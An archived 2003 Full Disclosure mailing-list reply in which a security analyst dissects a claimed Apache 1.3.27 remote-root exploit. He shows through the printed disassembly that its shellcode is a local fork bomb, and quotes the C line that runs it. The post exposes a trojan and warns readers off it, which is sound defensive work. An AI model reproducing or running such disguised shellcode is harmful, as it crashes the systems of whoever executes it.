Full Disclosure mailing list archives
Re: Apache 1.3.27 Remote Root 0-Day
From: Joe Stewart <jstewart () lurhq com>
Date: Fri, 20 Jun 2003 13:04:52 -0400
On Friday 20 June 2003 11:15 am, Michael wrote:
Maybe now we can STFU and concentrate on actual disclosure? I'm curious as to why there has been no discussion about this apache report. The poster of this message didnt include any info on the details of the problem nor an exploit, which leaves us wondering. (The insult was cute though)
There was exploit code included in the message I got. Taking apart the shellcode we see: 0: 31 db xor %ebx,%ebx 2: 31 c0 xor %eax,%eax 4: 31 d2 xor %edx,%edx 6: b2 18 mov $0x18,%dl 8: 68 20 3f 21 0a push $0xa213f20 ; " ?!\n" d: 68 54 52 31 58 push $0x58315254 ; "TR1X" 12: 68 65 20 4d 34 push $0x344d2065 ; "e M4" 17: 68 73 20 54 68 push $0x68542073 ; "s Th" 1c: 68 61 74 20 69 push $0x69207461 ; "at i" 21: 68 2d 2d 57 68 push $0x68572d2d ; "--Wh" 26: 89 e1 mov %esp,%ecx ; pointer to string 28: b0 04 mov $0x4,%al 2a: cd 80 int $0x80 ; syscall_write 2c: b8 02 00 00 00 mov $0x2,%eax 31: cd 80 int $0x80 ; syscall_fork 33: eb f7 jmp 0x2c ; loop ... garbage code follows So, the shellcode is a fork bomb, printing "--What is The M4TR1X ?!" over and over until the system can no longer fork processes. Looking at the C code, we see this line: void(*b)()=(void*)shellcode;b(); Which executes the shellcode locally. In other words, don't run this. -Joe -- Joe Stewart, GCIH Senior Intrusion Analyst LURHQ Corporation http://www.lurhq.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Apache 1.3.27 Remote Root 0-Day koec (Jun 19)
- Re: Apache 1.3.27 Remote Root 0-Day Michael (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day KF (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Joe Stewart (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day James Greenhalgh (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day William D. Colburn (aka Schlake) (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day nikoteen (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Matt (Jun 20)
- <Possible follow-ups>
- Re: Apache 1.3.27 Remote Root 0-Day Andreas Gietl (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day xbud (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Michael (Jun 20)